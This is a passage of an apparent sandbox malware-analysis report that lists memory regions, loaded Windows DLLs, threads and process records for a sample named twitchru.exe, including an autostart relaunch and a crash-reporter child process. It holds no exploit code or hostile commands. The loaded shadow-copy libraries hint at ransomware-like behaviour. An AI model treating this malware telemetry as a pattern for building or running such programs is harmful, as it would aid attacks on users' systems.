0x13f0000 end_va = 0x53effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 504 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 505 start_va = 0x7f720000 end_va = 0x7f742fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f720000" filename = "" Region: id = 506 start_va = 0x7f749000 end_va = 0x7f74bfff entry_point = 0x0 region_type = private name = "private_0x000000007f749000" filename = "" Region: id = 507 start_va = 0x7f74c000 end_va = 0x7f74cfff entry_point = 0x0 region_type = private name = "private_0x000000007f74c000" filename = "" Region: id = 508 start_va = 0x7f74f000 end_va = 0x7f74ffff entry_point = 0x0 region_type = private name = "private_0x000000007f74f000" filename = "" Region: id = 509 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 510 start_va = 0x7fff0000 end_va = 0x7df8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 511 start_va = 0x7df8ee380000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df8ee380000" filename = "" Region: id = 512 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 513 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 514 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 515 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 516 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 517 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 518 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 519 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 520 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 521 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 522 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 523 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 524 start_va = 0x360000 end_va = 0x41dfff entry_point = 0x360000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 525 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 526 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 527 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 528 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 529 start_va = 0x74640000 end_va = 0x7475afff entry_point = 0x74640000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 530 start_va = 0x74760000 end_va = 0x74770fff entry_point = 0x74760000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 531 start_va = 0x74780000 end_va = 0x74797fff entry_point = 0x74780000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 532 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 533 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 534 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 535 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 536 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 537 start_va = 0x769b0000 end_va = 0x76a0bfff entry_point = 0x769b0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 538 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 539 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 540 start_va = 0x76c90000 end_va = 0x76d21fff entry_point = 0x76c90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 541 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 542 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 543 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 544 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 545 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 546 start_va = 0x773e0000 end_va = 0x773e6fff entry_point = 0x773e0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 547 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 548 start_va = 0x7f61d000 end_va = 0x7f61ffff entry_point = 0x0 region_type = private name = "private_0x000000007f61d000" filename = "" Region: id = 549 start_va = 0x7f620000 end_va = 0x7f71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f620000" filename = "" Region: id = 550 start_va = 0x7f743000 end_va = 0x7f745fff entry_point = 0x0 region_type = private name = "private_0x000000007f743000" filename = "" Region: id = 551 start_va = 0x7f746000 end_va = 0x7f748fff entry_point = 0x0 region_type = private name = "private_0x000000007f746000" filename = "" Region: id = 552 start_va = 0x5b0000 end_va = 0x737fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 553 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 554 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 555 start_va = 0x80000 end_va = 0x8cfff entry_point = 0x80000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui") Region: id = 556 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 557 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 558 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 559 start_va = 0x740000 end_va = 0x8c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 560 start_va = 0x53f0000 end_va = 0x67effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053f0000" filename = "" Region: id = 561 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 562 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 563 start_va = 0x76820000 end_va = 0x768a1fff entry_point = 0x76820000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 564 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 565 start_va = 0x74620000 end_va = 0x74632fff entry_point = 0x74620000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 566 start_va = 0x74a40000 end_va = 0x74a5afff entry_point = 0x74a40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 567 start_va = 0x745f0000 end_va = 0x7461efff entry_point = 0x745f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Thread: id = 14 os_tid = 0xcc4 Thread: id = 15 os_tid = 0xcc8 Thread: id = 16 os_tid = 0xccc Thread: id = 17 os_tid = 0xcd0 Thread: id = 18 os_tid = 0xd00 Thread: id = 19 os_tid = 0xd04 Thread: id = 20 os_tid = 0xd08 Process: id = "5" image_name = "twitchru.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe" page_root = "0x47ac3000" os_pid = "0xd18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x56c" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " cur_dir = "C:\\Windows\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "6" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x3921c000" os_pid = "0xd64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x56c" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1388 -s 23912" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 585 start_va = 0xa80000 end_va = 0xac2fff entry_point = 0xa80000 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 586 start_va = 0xd30000 end_va = 0x4d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 587 start_va = 0x4d30000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 588 start_va = 0x4d50000 end_va = 0x4d50fff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 589 start_va = 0x4d60000 end_va = 0x4d73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 590 start_va = 0x4d80000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 591 start_va = 0x4dc0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 592 start_va = 0x4e00000 end_va = 0x4e03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e00000" filename = "" Region: id = 593 start_va = 0x4e10000 end_va = 0x4e12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e10000" filename = "" Region: id = 594 start_va = 0x4e20000 end_va = 0x4e21fff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 595 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 596 start_va = 0x7f580000 end_va = 0x7f5a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f580000" filename = "" Region: id = 597 start_va = 0x7f5a4000 end_va = 0x7f5a4fff entry_point = 0x0 region_type = private name = "private_0x000000007f5a4000" filename = "" Region: id = 598 start_va = 0x7f5ac000 end_va = 0x7f5aefff entry_point = 0x0 region_type = private name = "private_0x000000007f5ac000" filename = "" Region: id = 599 start_va = 0x7f5af000 end_va = 0x7f5affff entry_point = 0x0 region_type = private name = "private_0x000000007f5af000" filename = "" Region: id = 600 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 601 start_va = 0x7fff0000 end_va = 0x7df8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 602 start_va = 0x7df8ee380000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df8ee380000" filename = "" Region: id = 603 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 604 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 605 start_va = 0x4eb0000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 606 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 607 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 608 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 609 start_va = 0x4d30000 end_va = 0x4d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d30000" filename = "" Region: id = 610 start_va = 0x4d40000 end_va = 0x4d43fff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 611 start_va = 0x4e30000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 612 start_va = 0x4e70000 end_va = 0x4eaffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 613 start_va = 0x4ee0000 end_va = 0x4fdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 614 start_va = 0x4fe0000 end_va = 0x509dfff entry_point = 0x4fe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 615 start_va = 0x50a0000 end_va = 0x50dffff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 616 start_va = 0x50e0000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 617 start_va = 0x5120000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 618 start_va = 0x5160000 end_va = 0x519ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 619 start_va = 0x51a0000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 620 start_va = 0x51e0000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 621 start_va = 0x5260000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 622 start_va = 0x744a0000 end_va = 0x745defff entry_point = 0x744a0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 623 start_va = 0x745e0000 end_va = 0x74664fff entry_point = 0x745e0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 624 start_va = 0x74670000 end_va = 0x746c2fff entry_point = 0x74670000 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 625 start_va = 0x746d0000 end_va = 0x746f0fff entry_point = 0x746d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 626 start_va = 0x74a40000 end_va = 0x74a5afff entry_point = 0x74a40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 627 start_va = 0x74d10000 end_va = 0x74d30fff entry_point = 0x74d10000 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 628 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 629 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 630 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 631 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 632 start_va = 0x75220000 end_va = 0x75255fff entry_point = 0x75220000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 633 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 634 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 635 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 636 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 637 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 638 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 639 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 640 start_va = 0x7f47a000 end_va = 0x7f47cfff entry_point = 0x0 region_type = private name = "private_0x000000007f47a000" filename = "" Region: id = 641 start_va = 0x7f47d000 end_va = 0x7f47ffff entry_point = 0x0 region_type = private name = "private_0x000000007f47d000" filename = "" Region: id = 642 start_va = 0x7f480000 end_va = 0x7f57ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 643 start_va = 0x7f5a6000 end_va = 0x7f5a8fff entry_point = 0x0 region_type = private name = "private_0x000000007f5a6000" filename = "" Region: id = 644 start_va = 0x7f5a9000 end_va = 0x7f5abfff entry_point = 0x0 region_type = private name = "private_0x000000007f5a9000" filename = "" Thread: id = 22 os_tid = 0xd68 Thread: id = 23 os_tid = 0xd88 Thread: id = 24 os_tid = 0xd8c Thread: id = 25 os_tid = 0xdb4 Thread: id = 26 os_tid = 0xf00 Process: id = "7" image_name = "twitchru.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe" page_root = "0x322ff000" os_pid = "0x784" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 645 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 646 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 647 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 648 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 649 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 650 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 651 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 652 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 653 start_va = 0x400000 end_va = 0x48afff entry_point = 0x400000 region_type = mapped_file name = "twitchru.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe") Region: id = 654 start_va = 0x76f90000 end_va = 0x77108fff entry_point = 0x76f90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 655 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 656 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 657 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 658 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 659 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 660 start_va = 0x7fff0000 end_va = 0x7ffa4d88ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 661 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 662 start_va = 0x7ffa4da52000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffa4da52000" filename = "" Region: id = 808 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 809 start_va = 0x716e0000 end_va = 0x71752fff entry_point = 0x716e0000 region_type = mapped_file name = "wow64win.dll" 